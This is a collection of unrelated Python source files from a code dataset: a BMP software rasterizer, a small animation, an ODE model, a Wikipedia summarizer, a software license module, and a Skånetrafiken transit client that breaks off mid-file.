+ 40 + self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(14 + 40))\n\n # Image Header 40 bytes\n archivo.write(dword(40))\n archivo.write(dword(self.width))\n archivo.write(dword(self.height))\n archivo.write(word(1))\n archivo.write(word(24))\n archivo.write(dword(0))\n archivo.write(dword(self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n\n # Pixeles, 3 bytes cada uno\n\n for x in range(self.height):\n for y in range(self.width):\n #try:\n archivo.write(self.pixels[x][y])\n \"\"\"except:\n continue\"\"\"\n\n\n archivo.close()\n \n def glZBuffer(self, filename):\n archivo = open(filename, 'wb')\n #misma configuracion de espacio que glFinish\n # File header 14 bytes\n archivo.write(bytes('B'.encode('ascii')))\n archivo.write(bytes('M'.encode('ascii')))\n archivo.write(dword(14 + 40 + self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(14 + 40))\n\n # Image Header 40 bytes\n archivo.write(dword(40))\n archivo.write(dword(self.width))\n archivo.write(dword(self.height))\n archivo.write(word(1))\n archivo.write(word(24))\n archivo.write(dword(0))\n archivo.write(dword(self.width * self.height * 3))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n archivo.write(dword(0))\n\n #Minimo y el maximo del Zbuffer\n minZ = float('inf')\n maxZ = -float('inf')\n for x in range(self.height):\n for y in range(self.width):\n if self.zbuffer[x][y] != -float('inf'):\n if self.zbuffer[x][y] < minZ:\n minZ = self.zbuffer[x][y]\n\n if self.zbuffer[x][y] > maxZ:\n maxZ = self.zbuffer[x][y]\n\n for x in range(self.height):\n for y in range(self.width):\n depth = self.zbuffer[x][y]\n if depth == -float('inf'):\n depth = minZ\n depth = (depth - minZ) / (maxZ - minZ)\n archivo.write(color(depth,depth,depth))\n\n archivo.close()\n\n def glLine(self, x0, y0, x1, y1): #algoritmo de clase modificado por mi en base al algoritmo de Bersenham extraido de : https://www.geeksforgeeks.org/bresenhams-line-generation-algorithm/\n x0 = int(( x0 + 1) * (self.vportwidth / 2 ) + self.vportx)\n x1 = int(( x1 + 1) * (self.vportwidth / 2 ) + self.vportx)\n y0 = int(( y0 + 1) * (self.vportheight / 2 ) + self.vporty)\n y1 = int(( y1 + 1) * (self.vportheight / 2 ) + self.vporty)\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n inc = dy > dx\n\n if inc:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n limit = 0.5\n \n #a diferencia del visto en clase, el algoritmo consultado inicializa m como 2 veces el diferencial en y \n #y offset como la resta entre la pendiente m y 2 veces el diferencial en x\n m=2*(dy)\n offset=m-2*dx\n y = y0\n for x in range(x0, x1 + 1):\n if inc:\n self.glVertex_coord(y, x)\n else:\n self.glVertex_coord(x, y)\n offset += m\n if offset >= limit:\n if y0 < y1:\n y += 1\n else:\n y-=1\n limit += 1\n #igualmente cuando offset es mayor o igual que el limite 0.5, se le resta 2 veces el diferencial en x\n offset-=2*dx\n \n def glLine_c(self, x0, y0, x1, y1):#algoritmo realizado con Carlos en clase, lo mantengo como comparacion y el resultado es muy similar al desarrollado por mi\n x0 = int(( x0 + 1) * (self.vportwidth / 2 ) + self.vportx)\n x1 = int(( x1 + 1) * (self.vportwidth / 2 ) + self.vportx)\n y0 = int(( y0 + 1) * (self.vportheight / 2 ) + self.vporty)\n y1 = int(( y1 + 1) * (self.vportheight / 2 ) + self.vporty)\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n inc = dy > dx\n\n if inc:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n offset = 0\n limit = 0.5\n m = dy/dx\n y = y0\n for x in range(x0, x1 + 1):\n if inc:\n self.glVertex_coord(y, x)\n else:\n self.glVertex_coord(x, y)\n offset += m\n if offset >= limit:\n y += 1 if y0 < y1 else -1\n limit += 1\n\n def glLine_coord(self, x0, y0, x1, y1): #window coordinates en base a mi algoritmo realizado, no da problema con division con cero\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n inc = dy > dx\n\n if inc:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n limit = 0.5\n \n #a diferencia del visto en clase, el algoritmo consultado inicializa m como 2 veces el diferencial en y \n #y offset como la resta entre la pendiente m y 2 veces el diferencial en x\n \n m=2*dy\n \n y = y0\n \n offset=m-2*dx\n for x in range(x0, x1 + 1):\n if inc:\n self.glVertex_coord(y, x)\n else:\n self.glVertex_coord(x, y)\n offset += m\n if offset >= limit:\n if y0 < y1:\n y += 1\n else:\n y-=1\n limit += 1\n #igualmente cuando offset es mayor o igual que el limite 0.5, se le resta 2 veces el diferencial en x\n offset-=2*dx\n\n #Barycentric Coordinates\n def triangle_bc(self, Ax, Bx, Cx, Ay, By, Cy, Az, Bz, Cz, tax, tbx, tcx, tay, tby, tcy, normals=(), colorest = WHITE):\n #bounding box\n minX = int(min(Ax, Bx, Cx))\n minY = int( min(Ay, By, Cy))\n maxX = int(max(Ax, Bx, Cx))\n maxY = int(max(Ay, By, Cy))\n\n for x in range(minX, maxX + 1):\n for y in range(minY, maxY + 1):\n if x >= self.width or x < 0 or y >= self.height or y < 0: #para no dar error al intentar dibujar fuera del zbuffer\n continue\n u, v, w = baryCoords(Ax, Bx, Cx, Ay, By, Cy, x,y)\n\n if u >= 0 and v >= 0 and w >= 0:\n\n z = Az * u + Bz * v + Cz * w\n \n if z < self.zbuffer[y][x] and z <= 1 and z >= -1:\n \n if self.active_shader:\n \n r, g, b = self.active_shader(\n self,\n verts=(Ax, Bx, Cx, Ay, By, Cy, Az, Bz, Cz),\n baryCoords=(u,v,w),\n texCoords=(tax, tbx, tcx, tay, tby, tcy),\n normals=normals,\n color = colorest or self.curr_color,\n coordy=(y,x))\n else:\n b, g, r = colorest or self.curr_color\n \n \n\n self.glVertex_coord(x, y, color(r,g,b))\n self.zbuffer[y][x] = z\n \n #funciones para reemplazar numpy del ejemplo de Carlos\n #Realiza la resta entre 2 listas\n def subtract(self, x0, x1, y0, y1, z0, z1):\n res=[]\n res.append(x0-x1)\n res.append(y0-y1)\n res.append(z0-z1)\n return res\n #Realiza la resta entre 2 listas de 2 entradas\n def subtractTwo(self, x0, x1, y0, y1):\n res=[]\n res.append(x0-x1)\n res.append(y0-y1)\n return res\n #realiza producto cruz entre dos listas\n def cross(self, v0, v1):\n res=[]\n res.append(v0[1]*v1[2]-v1[1]*v0[2])\n res.append(-(v0[0]*v1[2]-v1[0]*v0[2]))\n res.append(v0[0]*v1[1]-v1[0]*v0[1])\n return res\n\n #Calcula normal de Frobenius\n def frobenius(self, norm):\n return((norm[0]**2+norm[1]**2+norm[2]**2)**(1/2))\n\n #calcula la division entre elementos de una lista y la normal de frobenius\n def division(self, norm, frobenius):\n #si la division es entre cero regresa un not a number\n if (frobenius==0):\n res=[]\n res.append(float('NaN'))\n res.append(float('NaN'))\n res.append(float('NaN'))\n return res\n #return float('NaN')\n else:\n res=[]\n res.append(norm[0]/ frobenius)\n res.append(norm[1]/ frobenius)\n res.append(norm[2]/ frobenius)\n return res\n \n #realiza producto punto entre la matriz y la luz\n def dot(self, normal, lightx, lighty, lightz):\n return (normal[0]*lightx+normal[1]*lighty+normal[2]*lightz)\n \n def multiN(self, c, normal):\n return (normal[0]*c,normal[1]*c,normal[2]*c)\n \n def dot4(self, matrix1, matrix2):\n return (matrix1[0]*matrix2[0]+matrix1[1]*matrix2[1]+matrix1[2]*matrix2[2]+matrix1[3]*matrix2[3])\n\n def multiplicacion(self, matriz1, matriz2, c1, f1, c2, f2): #función para multiplicar matrices\n matriz3 = []\n for i in range(f1):\n matriz3.append( [0] * c2 )\n\n for i in range(f1):\n for j in range(c2):\n for k in range(f2):\n numf=matriz1[i][k] * matriz2[k][j]\n matriz3[i][j] += numf\n \n \n return matriz3\n\n def multiplicacionV(self, G, v, f1, c2): #función para multiplicar matrices, esta fue un fracaso pero la dejo porque tengo fe que algun día funcionará\n result = []\n for i in range(0,f1): #this loops through columns of the matrix\n total = 0\n for j in range(0,c2): #this loops through vector coordinates & rows of matrix\n total += v[i] *G[j][i]\n result.append(total)\n return result\n \n def multMaster(self, v, M): #función para multiplicar desde matrices hasta vectores\n c = []\n for i in range(0,len(v)):\n temp=[]\n for j in range(0,len(M[0])):\n s = 0\n for k in range(0,len(v[0])):\n s += v[i][k]*M[k][j]\n temp.append(s)\n c.append(temp)\n return c\n \n \n\n def transform(self, vertex, vMatrix):#sustitucion del transform antiguo\n\n \n pVertex=[ [vertex[0]], [vertex[1]], [vertex[2]], [1]]\n a=self.multMaster(self.viewportMatrix, self.projectionMatrix)\n b=self.multMaster(a, self.viewMatrix)\n c=self.multMaster(b, vMatrix)\n pVertex=self.multMaster(c, pVertex)\n \n \n pVertex=(pVertex[0][0] / pVertex[3][0] ,\n pVertex[1][0] / pVertex[3][0] ,\n pVertex[2][0] / pVertex[3][0] )\n \n print(pVertex)\n \n return pVertex\n\n def dirTransform(self, vertex, vMatrix):#transform para las normales\n\n pVertex=[ [vertex[0]], [vertex[1]], [vertex[2]], [0]]\n \n a=self.multMaster(pVertex, vMatrix)\n \n pVertex=(a[0][0],\n a[1][0],\n a[2][0])\n\n return pVertex\n\n def createObjectMatrix(self, translate = (0,0,0), scale = (1,1,1), rotate=(0,0,0)):\n #matriz de traslacion\n translateMatrix = [[1, 0, 0, translate[0]],\n [0, 1, 0, translate[1]],\n [0, 0, 1, translate[2]],\n [0, 0, 0, 1]]\n\n #matriz de la escala\n scaleMatrix = [[scale[0], 0, 0, 0],\n [0, scale[1], 0, 0],\n [0, 0, scale[2], 0],\n [0, 0, 0, 1]]\n\n #matriz de rotacion\n rotationMatrix = self.createRotationMatrix(rotate)\n #multiplicacion de matrices sin numpy\n a=self.multiplicacion(translateMatrix, rotationMatrix, 4,4,4,4)\n b=self.multiplicacion(a, scaleMatrix, 4,4,4,4)\n\n return b\n \n def createRotationMatrix(self, rotate=(0,0,0)):\n\n pitch = np.deg2rad(rotate[0])\n yaw = np.deg2rad(rotate[1])\n roll = np.deg2rad(rotate[2])\n\n #matriz de rotacion en x\n rotationX = [[1, 0, 0, 0],\n [0, cos(pitch),-sin(pitch), 0],\n [0, sin(pitch), cos(pitch), 0],\n [0, 0, 0, 1]]\n #matriz de rotacion en y\n rotationY = [[cos(yaw), 0, sin(yaw), 0],\n [0, 1, 0, 0],\n [-sin(yaw), 0, cos(yaw), 0],\n [0, 0, 0, 1]]\n #matriz de rotacion en z\n rotationZ = [[cos(roll),-sin(roll), 0, 0],\n [sin(roll), cos(roll), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]]\n #multiplicacion de matrices sin numpy\n a=self.multiplicacion(rotationX, rotationY, 4,4,4,4)\n b=self.multiplicacion(a, rotationZ, 4,4,4,4)\n return (b)\n\n def loadModel(self, filename, translate= (0,0,0), scale= (1,1,1), rotate=(0,0,0), isWireframe = False): #funcion para crear modelo Obj\n model = Obj(filename)\n modelMatrix = self.createObjectMatrix(translate, scale, rotate)\n rotationMatrix = self.createRotationMatrix(rotate)\n\n for face in model.faces:\n vertCount = len(face) #conexion entre vertices para crear Wireframe\n if isWireframe:\n for vert in range(vertCount):\n v0 = model.vertices[ face[vert][0] - 1 ]\n v1 = model.vertices[ face[(vert + 1) % vertCount][0] - 1]\n #coordenadas para dibujar linea con escala y traslacion setteado\n x0 = int(v0[0] * scale[0] + translate[0])\n y0 = int(v0[1] * scale[1] + translate[1])\n x1 = int(v1[0] * scale[0] + translate[0])\n y1 = int(v1[1] * scale[1] + translate[1])\n\n #self.glVertex_coord(x0, y0)\n \n self.glLine_coord(x0, y0, x1, y1)\n else:\n v0 = model.vertices[ face[0][0] - 1 ]\n v1 = model.vertices[ face[1][0] - 1 ]\n v2 = model.vertices[ face[2][0] - 1 ]\n v0 = self.transform(v0, modelMatrix)\n v1 = self.transform(v1, modelMatrix)\n v2 = self.transform(v2, modelMatrix)\n\n \n x0 = v0[0]\n y0 = v0[1]\n z0 = v0[2]\n x1 = v1[0]\n y1 = v1[1]\n z1 = v1[2]\n x2 = v2[0]\n y2 = v2[1]\n z2 = v2[2]\n\n if vertCount > 3: #asumamos que 4, un cuadrado\n v3 = model.vertices[ face[3][0] - 1 ]\n v3 = self.transform(v3, modelMatrix)\n x3 = v3[0]\n y3 = v3[1]\n z3 = v3[2]\n\n #----------FORMULA CON FUNCIONES POR MI---------------\n #normal=productoCruz(V1-V0, v2-V0)/Frobenius\n\n if self.active_texture:\n vt0 = model.texcoords[face[0][1] - 1]\n vt1 = model.texcoords[face[1][1] - 1]\n vt2 = model.texcoords[face[2][1] - 1]\n vt0x=vt0[0]\n vt0y=vt0[1]\n vt1x=vt1[0]\n vt1y=vt1[1]\n vt2x=vt2[0]\n vt2y=vt2[1]\n if vertCount > 3:\n vt3 = model.texcoords[face[3][1] - 1]\n vt3x=vt3[0]\n vt3y=vt3[1]\n\n else:\n vt0x=0\n vt0y=0\n vt1x=0\n vt1y=0\n vt2x=0\n vt2y=0\n vt3x=0\n vt3y=0\n \n vn0 = model.normals[face[0][2] - 1]\n vn1 = model.normals[face[1][2] - 1]\n vn2 = model.normals[face[2][2] - 1]\n #para rotar normales y que la luz no se mueva con el modelo OBJ\n vn0 = self.dirTransform(vn0, rotationMatrix)#sustituir con transform de normales\n vn1 = self.dirTransform(vn1, rotationMatrix)\n vn2 = self.dirTransform(vn2, rotationMatrix)\n if vertCount > 3:\n vn3 = model.normals[face[3][2] - 1]\n vn3 = self.dirTransform(vn3, rotationMatrix)\n\n\n #normalMI=self.division(self.cross(self.subtract(x1, x0, y1, y0, z1, z0), self.subtract(x2, x0, y2, y0, z2, z0)),self.frobenius(self.cross(self.subtract(x1, x0, y1, y0, z1, z0), self.subtract(x2, x0, y2, y0, z2, z0))) )\n #ProductoCruz(normal,light)\n\n #intensity = self.dot(normalMI, lightx, lighty, lightz)\n \"\"\"print(\"--------------intensity----------------------------\")\n print(intensity)\n print(self.dot(normalMI, lightx, lighty, lightz))\"\"\"\n\n #if intensity >=0:\n \n if vertCount > 3:\n self.triangle_bc(x0,x2,x3, y0, y2,y3, z0, z2,z3, vt0x, vt2x,vt3x, vt0y, vt2y, vt3y , normals=(vn0,vn2,vn3))\n self.triangle_bc(x0,x1,x2, y0, y1, y2, z0, z1, z2, vt0x , vt1x,vt2x,vt0y,vt1y, vt2y, normals = (vn0,vn1,vn2))\n\n\n \n \n \n \n\n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"gl.py","file_name":"gl.py","file_ext":"py","file_size_in_byte":27481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275091733","text":"\"\"\"introduction: four seasons challeng\"\"\"\nfrom datetime import date, timedelta\nfrom math import sin\n\n\nWIDTH = 1024\nHEIGHT = 768\n\nday = date.today()\n\"\"\"current date\"\"\"\n\ntick = 0\n\npizza = Actor('pizza')\n\"\"\"the pizza to spin\"\"\"\n\nlandscape_a, landscape_b = Actor('landscape'), Actor('landscape')\n\n\ndef format_day(d):\n return d.strftime('%d %b %Y')\n\n\ndef position_landscape(offset):\n x = offset / 365\n # left hand side\n # x is initial offset of centre of image - full width * fraction\n landscape_a.pos = 1024 * 2 - (1024 * 4 * x), 768/2\n landscape_a.draw()\n\n # right hand side\n landscape_b.pos = 1024 * 6 - (1024 * 4 * x), 768/2\n landscape_b.draw()\n\n\ndef draw():\n offset = day.timetuple().tm_yday\n\n # put the background in at lowest z-index\n position_landscape(offset)\n\n # setup the pizza and its position\n pizza.pos = WIDTH / 2, 768 - 300 - sin(tick/20) * 50\n pizza.draw()\n\n screen.draw.textbox(\n format_day(day),\n Rect(\n (\n (1024/2) - 200,\n 25\n ),\n (\n (1024/2) - 50,\n 75\n ),\n )\n )\n\n\ndef update():\n global day, tick\n tick += 1\n day += timedelta(days=1)\n screen.clear()\n pizza.angle -= 360 / 365\n","sub_path":"shaunsfinger/intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"37037262","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport tensorflow as tf\nfrom tensorflow.contrib.integrate import odeint as tf_odeint\n\nfrom transformation.base import transformation\n\nclass fhn_transformation(transformation):\n\tdef transform(self, X_prev):\n\t\t\"\"\"\n\t\tIntegrates the fhn ODEs\n\n\t\tInput:\n\t\tfhn_params = a, b, c, I, dt\n\t\ta: the shape of the cubic parabola\n\t\tb: describes the kinetics of the recovery variable w\n\t\tc: describes the kinetics of the recovery variable\n\t\tI: input current\n\t\tdt: timestep\n\n\t\tOutput\n\t\tX = [V, w]\n\t\t\tV - membrane voltage\n\t\t\tw - recovery variable that mimics activation of an outward current\n\t\t\"\"\"\n\t\ta, b, c, I, dt = self.params\n\n\t\tdef fhn_equation(X, t, a, b, c, I):\n\t\t\tV, w = X\n\t\t\tdVdt = V-V**3/3 - w + I\n\t\t\tdwdt = a*(b*V - c*w)\n\t\t\treturn [dVdt, dwdt]\n\n\t\tt = np.arange(0, 2*dt, dt)\n\t\tX = odeint(fhn_equation, X_prev, t, args = (a, b, c, I))[1, :]\n\n\t\treturn X\n\nclass tf_fhn_transformation(transformation):\n\tdef transform(self, X_prev):\n\t\t\"\"\"\n\t\tX_prev.shape = [B0, B1, ..., Bn, Dx]\n\t\t\"\"\"\n\t\ta, b, c, I, dt = self.params\n\n\t\tdef fhn_equation(X, t):\n\t\t\tV, w = tf.unstack(X, axis = -1)\n\t\t\tdVdt = V-V**3/3 - w + I\n\t\t\tdwdt = a*(b*V - c*w)\n\t\t\treturn tf.stack([dVdt, dwdt], axis = -1)\n\n\t\tt = np.arange(0.0, 2*dt, dt)\n\t\tX = tf.unstack(tf_odeint(fhn_equation, X_prev, t, name = \"loc\"), axis = 0)[1]\n\n\t\treturn X\n\n# test code\nif __name__ == \"__main__\":\n\timport matplotlib.pyplot as plt\n\tfhn_params = (1.0, 0.95, 0.05, 1.0, 0.15)\n\tDx = 2\n\tT = 20\n\tbatch_size = 10\n\n\t# for np ver\n\tfhn = fhn_transformation(fhn_params)\n\n\tX = np.zeros((T, Dx))\n\tX[0] = np.random.uniform(low = 0, high = 1, size = Dx)\n\tfor t in range(1,T):\n\t\tX[t] = fhn.transform(X[t-1])\n\n\tplt.figure()\n\tplt.plot(X[:, 0], X[:, 1])\n\tplt.show()\n\n\t# for tf ver\n\ttf_fhn = tf_fhn_transformation(fhn_params)\n\n\tXs = []\n\tX = tf.constant(np.random.uniform(low = -1, high = 1, size = (batch_size, Dx)), dtype = tf.float32)\n\tfor t in range(1, T):\n\t\tX = tf_fhn.transform(X)\n\t\tXs.append(X)\n\n\tinit = tf.global_variables_initializer()\n\tsess = tf.InteractiveSession()\n\tsess.run(init)\n\tXs = tf.stack(Xs, axis = 1).eval()\n\n\tplt.figure()\n\tfor i in range(batch_size):\n\t\tplt.plot(Xs[i, :, 0], Xs[i, :, 1])\n\tplt.show()\n","sub_path":"not_used/SMC_supreme/transformation/fhn.py","file_name":"fhn.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440316253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 9 15:47:36 2019\r\n\r\n@author: Shaurya Gupta\r\n\"\"\"\r\n\r\nimport bs4 as bs \r\nimport urllib.request \r\nimport re \r\nimport nltk \r\nfrom heapq import nlargest \r\n \r\ndef get_summary(url): \r\n data = urllib.request.urlopen(url) \r\n article = data.read() \r\n \r\n parsed_text = bs.BeautifulSoup(article,'lxml') \r\n paragraph = parsed_text.find_all('p', limit=10) \r\n \r\n article_text = \"\" \r\n \r\n for p in paragraph: \r\n article_text += p.text \r\n \r\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text) \r\n article_text = re.sub(r'\\s+', ' ', article_text) \r\n \r\n article_text = re.sub(r'\\[[a-zA-Z]*\\]', ' ', article_text) \r\n article_text = re.sub(r'\\s+', ' ', article_text) \r\n \r\n plain_text = re.sub('[^a-zA-Z]', ' ', article_text ) \r\n plain_text = re.sub(r'\\s+', ' ', plain_text) \r\n \r\n stopwords = nltk.corpus.stopwords.words('english') \r\n \r\n word_frequency = {} \r\n for word in nltk.word_tokenize(plain_text): \r\n if word not in stopwords: \r\n if word not in word_frequency.keys(): \r\n word_frequency[word] = 1 \r\n else: \r\n word_frequency[word] += 1 \r\n max_frequency = max(word_frequency.values()) \r\n \r\n for word in word_frequency.keys(): \r\n word_frequency[word] = (word_frequency[word]/max_frequency) \r\n \r\n sentences = nltk.sent_tokenize(article_text)\r\n \r\n sentence_score = {} \r\n for sent in sentences: \r\n for word in nltk.word_tokenize(sent.lower()): \r\n if word in word_frequency.keys(): \r\n if len(sent.split(' ')) < 40: \r\n if sent not in sentence_score.keys(): \r\n sentence_score[sent] = word_frequency[word] \r\n else: \r\n sentence_score[sent] += word_frequency[word] \r\n summarized_sents = nlargest(10, sentence_score, key=sentence_score.get)\r\n \r\n summary = ' '.join(summarized_sents) \r\n print(summary)\r\n \r\n \r\n\r\nimport requests \r\nimport sys \r\npgname = sys.argv[1]\r\nif pgname!='':\r\n pgname = pgname.title()\r\n pgname=pgname.replace(\" \",\"_\") \r\n flag = 0 \r\n h = \"Machine_Learning\"\r\n url='https://en.wikipedia.org/wiki/'+pgname\r\n\r\n r = requests.get(url) \r\n if r.status_code == 200: \r\n flag=1 \r\n else: \r\n print('Wikipedia page does not exist') \r\n \r\n if flag==1: \r\n get_summary(url)","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"354964178","text":"import os\nimport wx\n\nfrom elibs import dict_to_prop\n\nfrom core import BASEDIR, log\n\n\nclass License:\n def __init__(self):\n self.license_file = os.path.join(BASEDIR, 'eservices.key')\n self.key = None\n self.company = None\n self.valid_date = None\n self.server_ip = None\n\n def _remove(self):\n import os\n os.remove(self.license_file)\n\n def load(self):\n from core import decrypt\n import json\n try:\n with open(self.license_file) as file:\n rd = file.read()\n dec_cfg = decrypt(rd)\n lic = dict_to_prop(json.loads(dec_cfg))\n import datetime\n valid_at = datetime.datetime.strptime(lic.ValidAt, '%Y-%m-%d')\n if valid_at < datetime.datetime.now():\n wx.MessageBox('Validade da licença expirada , o sistema será encerrado',\n 'Tempo expirado', wx.ICON_ERROR)\n file.close()\n self._remove()\n return False\n self.company = lic.Company\n self.valid_date = valid_at\n self.server_ip = lic.ServerIP\n return True\n except Exception as e:\n print(e)\n from core import log\n log.error(e)\n return False\n\n def check(self):\n if os.path.exists(self.license_file):\n try:\n self.load()\n except Exception as e:\n log.error(e)\n return False\n\n def save(self, config=dict):\n from core import encrypt\n import json\n enc_cfg = encrypt(json.dumps(config))\n print(config)\n try:\n with open(self.license_file, 'w', encoding='UTF8') as file:\n file.write(enc_cfg)\n return True\n except Exception as e:\n from core import log\n log.error(e)\n return False\n\n def verify(self):\n score = 0\n check_digit = self.key[0]\n check_digit_count = 0\n chunks = self.key.split('-')\n for chunk in chunks:\n if len(chunk) != 4:\n return False\n for char in chunk:\n if char == check_digit:\n check_digit_count += 1\n score += ord(char)\n if score == 1772 and check_digit_count == 5:\n return True\n return False\n\n def generate(self):\n import wmi\n c = wmi.WMI()\n for s in c.Win32_Processor():\n key = s.ProcessorId\n\n chunk = ''\n serial = ''\n count = 0\n for char in key:\n serial += char\n chunk += char\n count += 1\n if len(chunk) == 4 and not (len(key) == count):\n serial += '-'\n chunk = ''\n\n self.key = serial.upper()\n return self.key\n\n def get(self, machine, cpf, password):\n \"\"\"Constructs and sends a :class:`Request `.\n\n :param machine: machine name.\n :param cpf: CPF/CNPJ used for register.\n :param password: Password used just for authentication.\n \"\"\"\n import requests\n params = dict(\n machine=machine,\n serialKey=self.key,\n cpf=cpf,\n password=password\n )\n rs = requests.post(\n 'https://ellitedev.herokuapp.com/api/v1/register/',\n data=params\n )\n r = rs.json()\n if rs.status_code == 200:\n if self.save(r):\n return True, r['Company']\n return False, r['error']\n","sub_path":"core/license.py","file_name":"license.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"172688414","text":"def calc_number(*args):\n sum_num = 0\n for i in args:\n sum_num += i\n return sum_num\n\n\nresult = 0\nflags = True\nwhile flags:\n user_string = input('Введите числа через пробел, для выхода - q: ')\n user_list_str = user_string.split()\n user_list = []\n for val in user_list_str:\n if val == 'q':\n flags = False\n else:\n user_list.append(int(val))\n result += calc_number(*user_list)\n print(f'Промежуточная сумма = {result}')\n\nprint(f'Сумма = {result}')\n","sub_path":"Lesson_3/task_5.py","file_name":"task_5.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"501807886","text":"import requests\nfrom datetime import datetime\nfrom xml.etree import ElementTree as ET\n\ndef get_next_trips(longitude, latitude, stop_station_id):\n \"\"\" Returns a dict containing information about the next journeys from the given position to the station\n with the given station id.\n \n :param float longitude: The longitude part of the users position\n :param float latitude: The latitude part of the users position\n :param int stop_station_id: The body of the message\n :return: the next journeys from the position to the destination\n :rtype: dict\n \"\"\"\n\n j = {}\n journey_nbr = 0\n part_nbr = 0\n\n #### Find a start station id from given position\n start_stations = find_stations_by_pos(longitude, latitude)\n start_station_id = start_stations[0][1]\n\n #### Formating start and stop stations to match Skånetrafikens API\n start_station = \"a|\" + str(start_station_id) + \"|0\"\n stop_station = \"a|\" + str(stop_station_id) + \"|0\"\n\n ##### Collect the xml-tree from Skånetrafiken\n tree = get_xml_tree('http://www.labs.skanetrafiken.se/v2.2/resultspage.asp',\n {'cmdaction': 'next', 'selPointFr': start_station, 'selPointTo': stop_station})\n\n ##### Parse the xml-tree and extract what we need, busnbr, time to departure, start station etc.\n for journey in tree.iter('{http://www.etis.fskab.se/v1.0/ETISws}Journey'):\n part_nbr = 0\n minutes_set = False\n j[\"journey_\" + str(journey_nbr)] = {}\n\n for routelink in journey.iter('{http://www.etis.fskab.se/v1.0/ETISws}RouteLink'):\n if routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Line\").find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\").text == \"Gång\":\n continue\n \n ##### Sort out the info we want from skanetrafikens XML\n line = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Line\")\n transport_mode = line.find(\"{http://www.etis.fskab.se/v1.0/ETISws}TransportModeName\")\n no = line.find(\"{http://www.etis.fskab.se/v1.0/ETISws}No\")\n start_station = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}From\")\n start_station_name = start_station.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\")\n stop_station = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}To\")\n stop_station_name = stop_station.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\")\n dep_time = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}DepDateTime\")\n arr_time = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}ArrDateTime\")\n\n ##### Writes the JSON formatted dict we will return\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)] = {}\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"transport_mode\"] = transport_mode.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"line_number\"] = no.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"start_station\"] = start_station_name.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"stop_station\"] = stop_station_name.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"dep_time\"] = dep_time.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"arr_time\"] = arr_time.text\n \n if minutes_set == False: \n minutes = minutes_from_now(dep_time.text)\n j[\"journey_\" + str(journey_nbr)][\"minutes_from_now\"] = minutes\n minutes_set = True\n part_nbr += 1\n journey_nbr += 1\n\n return j\n\ndef find_station_by_name(searchStr):\n \"\"\" Returns a list containing information about the stations with names that somewhat matches the given search string.\n \n :param str searchStr: The serach string representing the name of a station\n :return: a list of stations with their names and id:s\n :rtype: list\n \"\"\"\n\n searchStr = searchStr.replace(\" \", \"+\")\n tree = get_xml_tree('http://www.labs.skanetrafiken.se/v2.2/querystation.asp?',\n {'inpPointFr': searchStr})\n result = []\n\n for dest in tree.iter('{http://www.etis.fskab.se/v1.0/ETISws}StartPoints'):\n for point in dest.iter('{http://www.etis.fskab.se/v1.0/ETISws}Point'):\n p = {}\n p[\"name\"] = point.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\").text\n p[\"id\"] = point.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Id\").text\n result.append(p)\n\n return result\n\n\n##### position är en gps-position. Returnerar ett stations-id enligt Skånetrafikens API, som en int\ndef find_stations_by_pos(longitude, latitude):\n \"\"\" Returns a list of stations that are close to the given position.\n \n :param float longitude: The longitude part of the users position\n :param float 